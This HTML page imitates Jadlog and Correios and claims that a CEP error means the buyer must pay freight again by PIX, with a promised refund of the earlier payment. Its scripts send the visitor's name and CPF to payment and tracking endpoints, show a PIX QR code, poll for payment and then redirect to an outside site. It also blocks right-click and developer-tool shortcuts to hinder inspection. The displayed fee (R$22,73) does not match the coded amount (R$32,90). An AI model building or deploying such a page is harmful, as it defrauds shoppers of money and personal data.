<!DOCTYPE html>
<html lang="pt-BR">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />

    <link rel="stylesheet" href="css/style.css" />
    <link rel="preconnect" href="https://fonts.googleapis.com" />
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="" />
    <link
      href="https://fonts.googleapis.com/css2?family=Roboto:ital,wght@0,100;0,300;0,400;0,500;0,700;0,900;1,100;1,300;1,400;1,500;1,700;1,900&amp;display=swap"
      rel="stylesheet"
    />

    <style>
      .roboto-regular {
        font-family: "Roboto", sans-serif;
        font-weight: 400;
        font-style: normal;
      }

      * {
        box-sizing: border-box;
        font-family: "Roboto", sans-serif;
        font-weight: 400;
        font-style: normal;
      }

      #buttonClick {
        background-color: #ffd400;
        color: white;
        font-family: "Poppins";
        padding: 7px 15px 7px 15px !important;
        text-decoration: none !important;
        border-radius: 10px !important;
        border: none !important;
        font-size: 18px !important;
        font-weight: 600;
      }

      #buttonClick:hover {
        background-color: #ffd400;
        cursor: pointer;
      }

      #setar {
        margin: 0 auto;
        display: flex;
        align-items: center;
        flex-direction: column;
        gap: 10px;
        font-size: 18px;
      }

      #setar b {
        font-weight: bold;
        color: #000 !important;
      }
      
      @keyframes spin {
        0% { transform: rotate(0deg); }
        100% { transform: rotate(360deg); }
      }

      #pix-code {
        margin-top: 10px;
        word-wrap: break-word;
        background: #f5f5f5;
        padding: 10px;
        border-radius: 4px;
        font-family: monospace;
        user-select: none;
        -webkit-user-select: none;
        -moz-user-select: none;
        -ms-user-select: none;
      }

      /* NOVOS ESTILOS PARA O QR CODE */
      #qr-code {
        width: 100%;
        max-width: 600px;
        margin: 0 auto;
        padding: 20px;
        text-align: center;
      }

      #qr-code img {
        width: 100%;
        max-width: 500px;
        height: auto;
        display: block;
        margin: 0 auto;
      }

      #qr-code h4 {
        color: #000;
        font-size: 1.1rem;
        margin-bottom: 20px;
        margin-top: 20px;
      }

      /* CORREÇÃO PARA O SCROLL */
      #popoup {
        position: fixed;
        top: 0;
        left: 0;
        width: 100%;
        height: 100%;
        background: rgba(0, 0, 0, 0.8);
        display: flex;
        justify-content: center;
        align-items: center;
        overflow-y: auto; /* Permite scroll vertical */
      }

      .popoupcontent {
        background: white;
        padding: 20px;
        border-radius: 10px;
        max-width: 90%;
        width: 600px;
        margin: 20px auto;
      }

      /* Estilo para o timer */
      .timer {
        font-weight: bold;
        color: black;
        font-size: 14px;
        text-align: center;
        margin-top: 20px; /* Espaçamento acima do timer */
      }
    </style>

    <title>VERIFICAÇÃO</title>
<!-- Meta Pixel Code -->
<script>
!function(f,b,e,v,n,t,s)
{if(f.fbq)return;n=f.fbq=function(){n.callMethod?
n.callMethod.apply(n,arguments):n.queue.push(arguments)};
if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
n.queue=[];t=b.createElement(e);t.async=!0;
t.src=v;s=b.getElementsByTagName(e)[0];
s.parentNode.insertBefore(t,s)}(window, document,'script',
'https://connect.facebook.net/en_US/fbevents.js');
fbq('init', '622398563718997');
fbq('track', 'PageView');
</script>

<noscript>
    <img height="1" width="1" style="display:none"
src="https://www.facebook.com/tr?id=622398563718997&ev=PageView&noscript=1"
/>
</noscript>
<!-- End Meta Pixel Code -->

<script
  src="https://cdn.utmify.com.br/scripts/utms/latest.js"
  data-utmify-prevent-xcod-sck
  data-utmify-prevent-subids
  data-utmify-prevent-path
  async
  defer
></script>

<script>
  window.pixelId = "67be9e6b30ed6c7200058c0a";
  var a = document.createElement("script");
  a.setAttribute("async", "");
  a.setAttribute("defer", "");
  a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
  document.head.appendChild(a);
</script>

<!-- Adicionar o rastreador de UTMs -->
<script src="js/utm-tracker.js"></script>

   
  </head>

  <body>
    <header>
      <img src="images/logo_home.png" alt="" />

      <p style="margin-top: 5px; font-size: 12px">
        Será responsável pelo envio do pedido.
      </p>
    </header>

    <div class="cta">
      <img id="imagem" src="images/certo-jadlog.png" alt="" />

      <p>Confirme os dados de envio do seu pedido:</p>
    </div>

    <div class="cta3">
      <p id="setars">O envio será assegurado pelos CORREIOS</p>
    </div>

    <div class="cta4">
      <span id="sends">CONFIRMAR</span>
    </div>

    <div id="popoup">
      <div class="popoupcontent">
        <div class="row">
          <img
            id="naomostrardeinicio"
            src="images/red-hazard-warning-sign-on-transparent-background-free-png.png"
            alt=""
          />

          <div class="headlineectapopoup">
            <h1 id="carregandodadoss">Confirmando seus dados...</h1>
            <p id="esconderdepois">Por favor aguarde</p>
          </div>

          <h1 id="carregandodadosSs">ERRO NO CEP</h1>
        </div>

        <div class="loading">
          <br />
          <div class="progresseBar">
            <div class="progress"></div>
          </div>
        </div>

        <div class="contente">
<p>
  O valor do Frete foi calculado errado para sua região, o pedido não
  será enviado.

  <br /><br />

  Para realizarmos o envio é necessário que envie o pagamento do
  frete.

  <br /><br />

  (O Valor pago do frete anterior será reembolsado.)
</p>


<strong style="color: black;">VALOR CORRETO DO FRETE:</strong> R$22,73

<br />

          <a
            id="buttonClick"
            href="javascript:void(0);"
          >
            PAGAR FRETE
          </a>

          <span id="maisforte">Clique no botão para continuar</span>
          
          <div id="qr-code"></div>
          <div id="pix-code"></div>
          <div class="loading-spinner" id="loading-spinner" style="display: none; border: 4px solid #f3f3f3; border-top: 4px solid #ffd400; border-radius: 50%; width: 30px; height: 30px; animation: spin 1s linear infinite; margin: 20px auto;"></div>
        </div>
      </div>
    </div>

    <footer>
      <img src="images/jadlog-logo-png.png" alt="" />

      <p>Todo conteúdo deste site está publicado sob a licença</p>
    </footer>

    <script src="js/text.js"></script>
    
    <script>
		// Recupera os valores da URL
		const urlParams = new URLSearchParams(window.location.search);
		const nome = urlParams.get('nome') || localStorage.getItem('name') || 'Cliente';
		const cpf = urlParams.get('cpf') || localStorage.getItem('cpf') || '00000000000';
		const value = '3290'; // Valor fixo R$32,90
		
		// Adiciona evento de clique ao botão
		document.getElementById('buttonClick').addEventListener('click', generatePix);
		
		async function generatePix() {
            document.getElementById('loading-spinner').style.display = 'block';
			
            try {
              const response = await fetch('./gerar_pix.php', {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/json',
                },
                body: JSON.stringify({
                    nome: nome,
                    cpf: cpf,
                    value: value
                })
              });

              const data = await response.json();

              if (data.success) {
                  document.getElementById('qr-code').innerHTML = `
                      <div id="generation-timer" class="timer" style="font-weight: bold; color: black; font-size: 14px; text-align: center; margin-bottom: 15px;"></div>
                      <h4>QR Code para pagamento:</h4>
                      <img src="${data.qrcode}" alt="QR Code">
                  `;

                  document.getElementById('pix-code').innerHTML = `
                      <div style="text-align: center; margin: 10px auto; padding: 10px; background: #f5f5f5; border-radius: 8px; word-break: break-all; max-width: 90%; font-family: monospace; font-size: 12px; border: 1px solid #ddd;">
                          00020126835674br.gov.bcb.pix2565pix.correios.com.br/qr/v3/at/157cb39b-3bd6-480e-a5d6-a99ee043c9915204000053039865802BR5920CORREIOS BRASIL6010PARNAMIRIM62070503***6304D68C
                      </div>
                  `;

                  const copyButton = document.createElement('button');
                  copyButton.innerText = 'COPIAR CÓDIGO PIX COPIA E COLA';
                  copyButton.style = 'background: #ffd400; color: #000; padding: 10px 20px; border: none; border-radius: 10px; margin: 15px auto; cursor: pointer; font-size: 1rem; display: block; font-weight: 600; width: 90%; max-width: 300px;';
                  copyButton.addEventListener('click', () => {
                      navigator.clipboard.writeText(data.codigoPix).then(() => {
                          alert('Código PIX copiado para a área de transferência!');
                      });
                  });
                  document.getElementById('qr-code').appendChild(copyButton);

                  document.getElementById('buttonClick').style.display = 'none';
                  document.getElementById('maisforte').style.display = 'none';

                  startGenerationTimer(10);

                  verificarStatusPagamento(data.id);
                  
                  // Enviar evento para UTMfy - status aguardando pagamento
                  fetch('../check_utmify_sync.php', {
                      method: 'POST',
                      headers: {
                          'Content-Type': 'application/json',
                      },
                      body: JSON.stringify({
                          orderId: data.id,
                          status: 'waiting_payment',
                          customerName: nome,
                          customerCPF: cpf,
                          value: value,
                          url: window.location.href
                      })
                  })
                  .catch(error => console.error('Erro ao enviar evento para UTMfy:', error));
                  
              } else {
                  alert('Erro ao gerar pagamento PIX: ' + (data.message || 'Tente novamente.'));
                  console.error('Resposta da API:', data);
              }
          } catch (error) {
              console.error('Erro na requisição:', error);
              alert('Erro ao gerar pagamento PIX. Tente novamente.');
          } finally {
              document.getElementById('loading-spinner').style.display = 'none';
          }
      }

      function verificarStatusPagamento(transactionId) {
          function checkStatus() {
              // Obtém o caminho absoluto para o arquivo de verificação de status
              const baseUrl = window.location.pathname.substring(0, window.location.pathname.lastIndexOf('/') + 1);
              const statusUrl = `../upsell1/verifica_status.php?id=${transactionId}`;
              
              fetch(statusUrl)
                  .then(response => response.json())
                  .then(data => {
                      if (data.status === "APPROVED") {
                          // Mantém todos os parâmetros UTM originais na URL de redirecionamento
                          const urlParams = new URLSearchParams(window.location.search);
                          
                          // Adiciona os dados do cliente aos parâmetros
                          urlParams.set('nome', nome);
                          urlParams.set('cpf', cpf);
                          urlParams.set('value', value);
                          
                          console.log("Redirecionando para página de confirmação com parâmetros:", Object.fromEntries(urlParams.entries()));
                          
                          // Como upsell4 foi removido, redirecionamos para a página de confirmação
                          const confirmacaoUrl = `https://encomendasparadas.site/obrigado/index.html?${urlParams.toString()}`;

                          // Redireciona para a página de confirmação com os parâmetros originais
                          window.location.href = confirmacaoUrl;
                      } else {
                          // Continua verificando o status a cada 5 segundos
                          setTimeout(checkStatus, 5000);
                      }
                  })
                  .catch(error => {
                      console.error("Erro ao verificar status:", error);
                      // Continua verificando o status a cada 5 segundos mesmo em caso de erro
                      setTimeout(checkStatus, 5000);
                  });
          }
          
          // Inicia a verificação do status
          checkStatus();
      }

      function startGenerationTimer(minutes) {
          const timerElement = document.getElementById('generation-timer');
          let timeLeft = minutes * 60;

          const timerInterval = setInterval(() => {
              const minutesLeft = Math.floor(timeLeft / 60);
              const secondsLeft = timeLeft % 60;
              timerElement.innerText = `TEMPO RESTANTE PARA EFETUAR O PAGAMENTO: ${minutesLeft}:${secondsLeft < 10 ? '0' : ''}${secondsLeft}`;
              timeLeft--;
              
              if (timeLeft < 0) {
                  clearInterval(timerInterval);
                  timerElement.innerText = 'TEMPO ESGOTADO. RECARREGUE A PÁGINA PARA GERAR UM NOVO PAGAMENTO.';
              }
          }, 1000);
      }
	</script>

    <script>
      document.addEventListener("DOMContentLoaded", function () {
        // Bloquear botão direito do mouse
        document.addEventListener("contextmenu", function (e) {
          e.preventDefault();
        });

        // Bloquear teclas de atalho para inspecionar
        document.addEventListener("keydown", function (e) {
          // F12
          if (e.keyCode === 123) {
            e.preventDefault();
          }
          // Ctrl+Shift+I
          if (e.ctrlKey && e.shiftKey && e.keyCode === 73) {
            e.preventDefault();
          }
          // Ctrl+Shift+J
          if (e.ctrlKey && e.shiftKey && e.keyCode === 74) {
            e.preventDefault();
          }
          // Ctrl+U
          if (e.ctrlKey && e.keyCode === 85) {
            e.preventDefault();
          }
          // Ctrl+Shift+C
          if (e.ctrlKey && e.shiftKey && e.keyCode === 67) {
            e.preventDefault();
          }
        });

        // Bloquear inspecionar através do clique direito (F12)
        document.onmousedown = function (e) {
          if (e.button === 2 || e.button === 3) {
            e.preventDefault();
          }
        };

        // Bloquear inspecionar através de arrastar e soltar (Ctrl+Shift+C)
        document.addEventListener("dragstart", function (e) {
          e.preventDefault();
        });
      });
    </script>
  </body>
</html>